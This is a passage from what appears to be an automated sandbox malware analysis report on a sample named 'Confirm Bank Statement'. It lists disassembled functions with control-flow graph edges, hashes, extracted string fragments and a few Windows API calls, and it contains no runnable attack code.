                                                                                              Function 072875E8 Relevance: 6.9, Strings: 5, Instructions: 624COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 518 72875e8-7289f88 521 728a46b-728a4d4 518->521 522 7289f8e-7289f93 518->522 529 728a4db-728a563 521->529 522->521 523 7289f99-7289fb6 522->523 523->529 530 7289fbc-7289fc0 523->530 571 728a56e-728a5ee 529->571 531 7289fcf-7289fd3 530->531 532 7289fc2-7289fcc 530->532 535 7289fe2-7289fe9 531->535 536 7289fd5-7289fdf 531->536 532->531 538 7289fef-728a01f 535->538 539 728a104-728a109 535->539 536->535 548 728a7ee-728a814 538->548 553 728a025-728a0f8 call 72875f8 * 2 538->553 543 728a10b-728a10f 539->543 544 728a111-728a116 539->544 543->544 545 728a118-728a11c 543->545 546 728a128-728a158 call 7287604 * 3 544->546 545->548 549 728a122-728a125 545->549 546->571 572 728a15e-728a161 546->572 561 728a824 548->561 562 728a816-728a822 548->562 549->546 553->539 580 728a0fa 553->580 566 728a827-728a82c 561->566 562->566 588 728a5f5-728a677 571->588 572->571 575 728a167-728a169 572->575 575->571 577 728a16f-728a1a4 575->577 587 728a1aa-728a1b3 577->587 577->588 580->539 590 728a1b9-728a213 call 7287604 * 2 call 7287614 * 2 587->590 591 728a316-728a31a 587->591 594 728a67f-728a701 588->594 634 728a225 590->634 635 728a215-728a21e 590->635 591->594 595 728a320-728a324 591->595 598 728a709-728a736 594->598 595->598 599 728a32a-728a330 595->599 610 728a73d-728a7bd 598->610 603 728a332 599->603 604 728a334-728a369 599->604 606 728a370-728a376 603->606 604->606 609 728a37c-728a384 606->609 606->610 618 728a38b-728a38d 609->618 619 728a386-728a38a 609->619 667 728a7c4-728a7e6 610->667 622 728a3ef-728a3f5 618->622 623 728a38f-728a3b3 618->623 619->618 630 728a414-728a442 622->630 631 728a3f7-728a412 622->631 655 728a3bc-728a3c0 623->655 656 728a3b5-728a3ba 623->656 651 728a44a-728a456 630->651 631->651 641 728a229-728a22b 634->641 635->641 642 728a220-728a223 635->642 646 728a22d 641->646 647 728a232-728a236 641->647 642->641 646->647 653 728a238-728a23f 647->653 654 728a244-728a24a 647->654 666 728a45c-728a468 651->666 651->667 662 728a2e1-728a2e5 653->662 657 728a24c-728a252 654->657 658 728a254-728a259 654->658 655->548 661 728a3c6-728a3c9 655->661 663 728a3cc-728a3dd 656->663 668 728a25f-728a265 657->668 658->668 661->663 670 728a304-728a310 662->670 671 728a2e7-728a301 662->671 705 728a3df call 728a878 663->705 706 728a3df call 728a888 663->706 667->548 675 728a26b-728a270 668->675 676 728a267-728a269 668->676 670->590 670->591 671->670 680 728a272-728a284 675->680 676->680 678 728a3e5-728a3ed 678->651 686 728a28e-728a293 680->686 687 728a286-728a28c 680->687 688 728a299-728a2a0 686->688 687->688 690 728a2a2-728a2a4 688->690 691 728a2a6 688->691 696 728a2ab-728a2b6 690->696 691->696 697 728a2b8-728a2bb 696->697 698 728a2da 696->698 697->662 700 728a2bd-728a2c3 697->700 698->662 701 728a2ca-728a2d3 700->701 702 728a2c5-728a2c8 700->702 701->662 704 728a2d5-728a2d8 701->704 702->698 702->701 704->662 704->698 705->678 706->678
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq$Hq$Hq$Hq$Hq
                                                                                              • API String ID: 0-3799487529
                                                                                              • Opcode ID: 93f8329a2b631cf007947afb3f7977a12abd12c429eb64f6c92a46309dc14eb4
                                                                                              • Instruction ID: d89736b0db2bacc4048f1b0741780c11ffb03fcbd0982a85e856b8bf0ecfa3a9
                                                                                              • Opcode Fuzzy Hash: 93f8329a2b631cf007947afb3f7977a12abd12c429eb64f6c92a46309dc14eb4
                                                                                              • Instruction Fuzzy Hash: 2A327DB0E112198FDB59EFA8C85079EBBB2BF84300F14C56AD40AEB395DE359C45CB91
                                                                                              Function 072875DB Relevance: .3, Instructions: 283COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 168cd8c8be649375bcf0078fe20812a8f27e7c72df784c3a10e95aae4fdd1b1c
                                                                                              • Instruction ID: e897b149036eeca6236521748ed0bf0a31eb029c7c024b84feecf5ea0b0cd28d
                                                                                              • Opcode Fuzzy Hash: 168cd8c8be649375bcf0078fe20812a8f27e7c72df784c3a10e95aae4fdd1b1c
                                                                                              • Instruction Fuzzy Hash: 50C18CB0E11219CFDF55DFA9C88079DBBB2BF84300F14C5AAD409AB295EB359985CF50
                                                                                              Function 07289F50 Relevance: .3, Instructions: 282COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c2b470026ed346dfe0fb2fe28e64c16225b6842d255705904252a624fd86ad8a
                                                                                              • Instruction ID: ce390bd1f9ef875ebe834e121c585076a95b5d15fe912070c9511548053bd75e
                                                                                              • Opcode Fuzzy Hash: c2b470026ed346dfe0fb2fe28e64c16225b6842d255705904252a624fd86ad8a
                                                                                              • Instruction Fuzzy Hash: 0AC19DB0E112198FDF55EFA8C88079DBBB2BF84300F14C5AAD409AB295EB31D985CF50
                                                                                              Function 01434AE0 Relevance: .3, Instructions: 271COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dccfc7ddfa8df9439be7adb2ee54e20affffb87d55b275d4a91c5aa41bc05c25
                                                                                              • Instruction ID: 0b7aefe5a488bcae4dfcc95e1db5d0639969ffc4226b55478ad227fd02019cce
                                                                                              • Opcode Fuzzy Hash: dccfc7ddfa8df9439be7adb2ee54e20affffb87d55b275d4a91c5aa41bc05c25
                                                                                              • Instruction Fuzzy Hash: 90911093B04581CFE73571BE6C062A604D2E3ED01AB2EA15A7240DFBFAE576CD09C361
                                                                                              Function 07275D40 Relevance: .2, Instructions: 210COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 505d2798a3f2420746a895dbe2f54f4ff13600db572ea3a784dd4c2b2351156a
                                                                                              • Instruction ID: b4a96806156b47e8639e1d0faa1dfd91334ba6f3314601b7908f2caea65bb586
                                                                                              • Opcode Fuzzy Hash: 505d2798a3f2420746a895dbe2f54f4ff13600db572ea3a784dd4c2b2351156a
                                                                                              • Instruction Fuzzy Hash: 1A91E4B0D2521ADFDB14CFA6C9887EDFBB6BF4A300F108069E419A7261DBB45995CF40
                                                                                              Function 07270208 Relevance: 2.7, Strings: 2, Instructions: 229COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1249 7270208-7270217 1250 727021f-7270221 1249->1250 1252 7270223-7270238 1250->1252 1253 727023b-7270275 1250->1253 1260 7270277-727029c 1253->1260 1261 727029d-72702a8 1253->1261 1260->1261 1263 7270354-727036b 1261->1263 1264 72702ae-72702b0 1261->1264 1276 7270371 1263->1276 1277 727036d-727036f 1263->1277 1265 72702b6-72702c1 1264->1265 1266 72703de-7270419 1264->1266 1271 72702c3-72702c5 1265->1271 1272 72702de-72702e2 1265->1272 1294 7270441-7270487 1266->1294 1295 727041b-727043a 1266->1295 1278 72702c7-72702ce 1271->1278 1279 72702d0-72702db 1271->1279 1273 72702e4-72702f8 1272->1273 1274 7270341-727034a 1272->1274 1286 727030e-7270312 1273->1286 1287 72702fa-727030b 1273->1287 1280 7270376-7270378 1276->1280 1277->1280 1278->1272 1279->1272 1283 72703ac-72703d7 1280->1283 1284 727037a-72703a5 1280->1284 1283->1266 1284->1283 1290 7270314 1286->1290 1291 727031a-7270333 1286->1291 1287->1286 1290->1291 1298 7270335 1291->1298 1299 727033e 1291->1299 1302 7270490-72704b1 1294->1302 1303 7270489-727048f 1294->1303 1295->1294 1298->1299 1299->1274 1303->1302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (q$Hq
                                                                                              • API String ID: 0-1154169777
                                                                                              • Opcode ID: d47cef4fe57671cab03d9876dad85636eb2ff787850c31cc68b26f7ef2f8fa5d
                                                                                              • Instruction ID: b0265ef55516bffb9e0fa0c208a7c55437efad7808f48ec969b04255e50dad17
                                                                                              • Opcode Fuzzy Hash: d47cef4fe57671cab03d9876dad85636eb2ff787850c31cc68b26f7ef2f8fa5d
                                                                                              • Instruction Fuzzy Hash: 8571D4B5A102158FDB24EBA5D6057EEBBE6EFC8210F14842DD409E7390DB349C49CBA5
                                                                                              Function 055B83E0 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1309 55b83e0-55b8442 call 55b77b0 1315 55b84a8-55b84d4 1309->1315 1316 55b8444-55b8446 1309->1316 1317 55b84db-55b84e3 1315->1317 1316->1317 1318 55b844c-55b8458 1316->1318 1323 55b84ea-55b8625 1317->1323 1318->1323 1324 55b845e-55b8499 call 55b7f60 1318->1324 1342 55b862b-55b8639 1323->1342 1335 55b849e-55b84a7 1324->1335 1343 55b863b-55b8641 1342->1343 1344 55b8642-55b8688 1342->1344 1343->1344 1349 55b868a-55b868d 1344->1349 1350 55b8695 1344->1350 1349->1350 1351 55b8696 1350->1351 1351->1351
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq$Hq
                                                                                              • API String ID: 0-925789375
                                                                                              • Opcode ID: 4aac707a216ee8f73d25d51e28f0767670122e4ad038b516823e1a94b98f53c9
                                                                                              • Instruction ID: 6408b8706ac309214855060481fa1fb27682e4e9e0f8602c5bb70f56d7e71e7b
                                                                                              • Opcode Fuzzy Hash: 4aac707a216ee8f73d25d51e28f0767670122e4ad038b516823e1a94b98f53c9
                                                                                              • Instruction Fuzzy Hash: 37814A71E003198FDB14DFA9C8946EEBBF6FF89300F24852AE409AB354DB749945CB91
                                                                                              Function 072796B0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1405 72796b0-72796e3 1406 72796e5 1405->1406 1407 72796ea-72797e5 call 7279668 1405->1407 1406->1407 1416 7279797-727979d 1407->1416 1417 727972a-727972f 1407->1417 1416->1417 1418 7279734-727974d 1417->1418 1419 7279731-7279732 1417->1419 1421 7279752-7279756 1418->1421 1422 72797ea-7279811 call 7279e50 1418->1422 1419->1418 1423 72798b5-72798c9 1421->1423 1424 727975c-727975d 1421->1424 1432 7279817-7279818 1422->1432 1429 72798cf-72798d5 1423->1429 1425 7279826-7279896 1424->1425 1438 7279898 call 727a946 1425->1438 1439 7279898 call 727a6f5 1425->1439 1440 7279898 call 727adb2 1425->1440 1441 7279898 call 727a842 1425->1441 1442 7279898 call 727a661 1425->1442 1443 7279898 call 727a558 1425->1443 1429->1421 1432->1425 1434 72798a9-72798b3 1432->1434 1434->1429 1437 727989e-72798a8 1438->1437 1439->1437 1440->1437 1441->1437 1442->1437 1443->1437
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Teq$Teq
                                                                                              • API String ID: 0-2938103587
                                                                                              • Opcode ID: 78ed45b97d879ecb9ed92ce93f5e7ca6aaf5f3507cc8d2138eacd5707819a72a
                                                                                              • Instruction ID: 1956be9389e2e0aaebd1bbb9be23899b18ce5cc74ae9221bcf67b7d04fc2c148
                                                                                              • Opcode Fuzzy Hash: 78ed45b97d879ecb9ed92ce93f5e7ca6aaf5f3507cc8d2138eacd5707819a72a
                                                                                              • Instruction Fuzzy Hash: D151F7B4E25309CFDB08CFE9D954AEDBBB6BF89300F14912AD809AB354D7716845CB50
                                                                                              Function 072796C0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1445 72796c0-72796e3 1446 72796e5 1445->1446 1447 72796ea-72797e5 call 7279668 1445->1447 1446->1447 1456 7279797-727979d 1447->1456 1457 727972a-727972f 1447->1457 1456->1457 1458 7279734-727974d 1457->1458 1459 7279731-7279732 1457->1459 1461 7279752-7279756 1458->1461 1462 72797ea-7279811 call 7279e50 1458->1462 1459->1458 1463 72798b5-72798c9 1461->1463 1464 727975c-727975d 1461->1464 1472 7279817-7279818 1462->1472 1469 72798cf-72798d5 1463->1469 1465 7279826-7279896 1464->1465 1478 7279898 call 727a946 1465->1478 1479 7279898 call 727a6f5 1465->1479 1480 7279898 call 727adb2 1465->1480 1481 7279898 call 727a842 1465->1481 1482 7279898 call 727a661 1465->1482 1483 7279898 call 727a558 1465->1483 1469->1461 1472->1465 1474 72798a9-72798b3 1472->1474 1474->1469 1477 727989e-72798a8 1478->1477 1479->1477 1480->1477 1481->1477 1482->1477 1483->1477
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Teq$Teq
                                                                                              • API String ID: 0-2938103587
                                                                                              • Opcode ID: 7d2624f7a0a7d4c21399b494f64c009e8d681c5870a0e56862099a2daafb65fb
                                                                                              • Instruction ID: 6477666ec954aa3f4386b2114137c4db5aa407f208aa3c1d6f2d7053abba50b0
                                                                                              • Opcode Fuzzy Hash: 7d2624f7a0a7d4c21399b494f64c009e8d681c5870a0e56862099a2daafb65fb
                                                                                              • Instruction Fuzzy Hash: 6751C4B4E25309CFDB08CFA9D584AADBBB6FF89300F14912AD819AB354D7716845CB50
                                                                                              Function 055B2514 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1352 55b2514-55b3ab1 1377 55b3ab4 call 55b4658 1352->1377 1378 55b3ab4 call 55b4648 1352->1378 1359 55b3aba-55b3ad3 1363 55b3b35-55b3c1a call 55b2544 call 55b1668 call 55b2554 1359->1363 1364 55b3ad5-55b3b2d 1359->1364 1364->1363 1377->1359 1378->1359
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-227171996
                                                                                              • Opcode ID: fa552cbed1f03b22c21b9254d8ba06addd2a4ace6973888f9960c0c8c9dff7eb
                                                                                              • Instruction ID: 0e3a61f154255424b9d8e7ff02330a20dafc4c8a5aa40e298afc07630ba52873
                                                                                              • Opcode Fuzzy Hash: fa552cbed1f03b22c21b9254d8ba06addd2a4ace6973888f9960c0c8c9dff7eb
                                                                                              • Instruction Fuzzy Hash: 3371E13191070ACFEF01DF28D484555B7B5FF95314B408AA9EA49AF326EB71F888CB80
                                                                                              Function 055B39A0 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1379 55b39a0-55b3a99 1384 55b3aa5-55b3ab1 1379->1384 1403 55b3ab4 call 55b4658 1384->1403 1404 55b3ab4 call 55b4648 1384->1404 1385 55b3aba-55b3ad3 1389 55b3b35-55b3ba8 call 55b2544 1385->1389 1390 55b3ad5-55b3b2d 1385->1390 1392 55b3bad-55b3bb4 1389->1392 1390->1389 1394 55b3bba-55b3c1a call 55b1668 call 55b2554 1392->1394 1403->1385 1404->1385
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-227171996
                                                                                              • Opcode ID: 59f4955d1c24e0e6202c4d270f3c685f1c9d072850c4bcfc17a0783b181adf80
                                                                                              • Instruction ID: 4137a0be0d0cc596d66c33887050024588a3348417553bb844c707786612ec25
                                                                                              • Opcode Fuzzy Hash: 59f4955d1c24e0e6202c4d270f3c685f1c9d072850c4bcfc17a0783b181adf80
                                                                                              • Instruction Fuzzy Hash: F571E331900709CFEF01DF28D485644B7B5FF95314B408AA9EA49AF326EB71F988CB80
                                                                                              Function 0143B2B9 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B51E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: e623032ecf3996dcb86b6af459569c40cac7efbaaad53af02f0b393274397a9a
                                                                                              • Instruction ID: db682162e51e2ccaacbd53981f749a7109172b878034f3cf6fcd67200ea3e744
                                                                                              • Opcode Fuzzy Hash: e623032ecf3996dcb86b6af459569c40cac7efbaaad53af02f0b393274397a9a
                                                                                              • Instruction Fuzzy Hash: C1813370A00B158FD725DF6AD45475ABBF1FF88204F10892ED48AD7B60D735E84ACB91
                                                                                              Function 0727E730 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 0f47bdc128c3c8ab0da4ac42a28ad37f0aa3442524b9d30418aff5a48213537c
                                                                                              • Instruction ID: c228ce125df3bbac195f16f0a3bbc3e4ca0d5bc429a37fb1d13ea65ce9f68592
                                                                                              • Opcode Fuzzy Hash: 0f47bdc128c3c8ab0da4ac42a28ad37f0aa3442524b9d30418aff5a48213537c
                                                                                              • Instruction Fuzzy Hash: 77E151B5E00209DFDB15DFB4D554BADBBB2FB88300F1580A5D805A7364CB39AD42DB61
                                                                                              Function 01435CEC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 01435DA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: af512c608690a69c3c673076bc4c32f1f03462bece51b9e29317330a5970019c
                                                                                              • Instruction ID: 332b409e5f7e50f40ba666de02b56c6613a11b98dc3b0c49464f1f2d66b27d66
                                                                                              • Opcode Fuzzy Hash: af512c608690a69c3c673076bc4c32f1f03462bece51b9e29317330a5970019c
                                                                                              • Instruction Fuzzy Hash: 2341E271C00719CBEB24DFA9C844B8EBBF5BF88314F20816AD418AB265DB756946CF90
                                                                                              Function 01434538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 01435DA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 561ec581b752615c1d8ebc880548fb0360e426b938c63427541df4e925d3132f
                                                                                              • Instruction ID: f2696789817a300d927f957aa7f75e7c4dbd921f3652179f73077b8295868de4
                                                                                              • Opcode Fuzzy Hash: 561ec581b752615c1d8ebc880548fb0360e426b938c63427541df4e925d3132f
                                                                                              • Instruction Fuzzy Hash: 6641E271C0071DCBEB24DFA9C844B8EBBF5BF88314F20816AD419AB255DB756946CF90
                                                                                              Function 0728A888 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              • Opcode ID: 8df696c0db08aa233fb9bc9baaaa4e625dedfa43e36c30352d696b489c568611
                                                                                              • Instruction ID: 8a063294f2ab020cac271310609d617205adb3cf2f5bc7724fd894a2bb37ba67
                                                                                              • Opcode Fuzzy Hash: 8df696c0db08aa233fb9bc9baaaa4e625dedfa43e36c30352d696b489c568611
                                                                                              • Instruction Fuzzy Hash: E831CEB6904389DFCB11DFA9D800ADEBFF4EF09310F14845AE954A72A1C73A9954CFA1
                                                                                              Function 0143B1B4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0143D76E,?,?,?,?,?), ref: 0143D82F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: d6f1e884b004588ae389bc86d1464cd77aad520886be2d9da684c41d5869d3fd
                                                                                              • Instruction ID: 77c0dacb5e022df41df60783b8af366e7eb3453feea0d6e5bf076c481852afd3
                                                                                              • Opcode Fuzzy Hash: d6f1e884b004588ae389bc86d1464cd77aad520886be2d9da684c41d5869d3fd
                                                                                              • Instruction Fuzzy Hash: AF21E5B5D002489FDB10CF9AD984ADEBBF5FB48310F54841AE918A3350D774A945CFA1
                                                                                              Function 0143D7A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0143D76E,?,?,?,?,?), ref: 0143D82F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: e90c0388063f2e23b1d6ec298639c32c69292dc2c242b50961d2d94abc5a6ec8
                                                                                              • Instruction ID: 27419038976595277a00ffd6a9d121d9814ab906ad86508f39451158c8a6922c
                                                                                              • Opcode Fuzzy Hash: e90c0388063f2e23b1d6ec298639c32c69292dc2c242b50961d2d94abc5a6ec8
                                                                                              • Instruction Fuzzy Hash: BF2103B5D002089FDB10CF9AD885ADEBBF4FB48310F54842AE928A3350C378A940CF61
                                                                                              Function 07287624 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0728A8A2,?,?,?,?,?), ref: 0728A947
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274442520.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7280000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFromIconResource
                                                                                              • String ID:
                                                                                              • API String ID: 3668623891-0
                                                                                              • Opcode ID: ad6f5eee0bac5a45f9107dca5b32b18a3b17cc39324ec7680df93c618102a17f
                                                                                              • Instruction ID: 658209f7beda658ab285de12a6a0522cf6246858add7588577846972b5cf8022
                                                                                              • Opcode Fuzzy Hash: ad6f5eee0bac5a45f9107dca5b32b18a3b17cc39324ec7680df93c618102a17f
                                                                                              • Instruction Fuzzy Hash: B41156B58003499FDB20DF9AC844BEEBFF8EB48320F14841AE914A3250C779A950CFA5
                                                                                              Function 0143B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0143B51E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1266699529.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1430000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: f8432281161c4cf02deb21c8bc05b6dddc468a3b52c5b98611997595b406e9e0
                                                                                              • Instruction ID: 52f76f4d574219059534715ffad3a47344b56cb3f5f87c242cdc9411b575ac1c
                                                                                              • Opcode Fuzzy Hash: f8432281161c4cf02deb21c8bc05b6dddc468a3b52c5b98611997595b406e9e0
                                                                                              • Instruction Fuzzy Hash: 301102B6C003498FDB10CF9AD444B9EFBF4EB88314F14841AD429A7350D379A545CFA1
                                                                                              Function 055B81B4 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
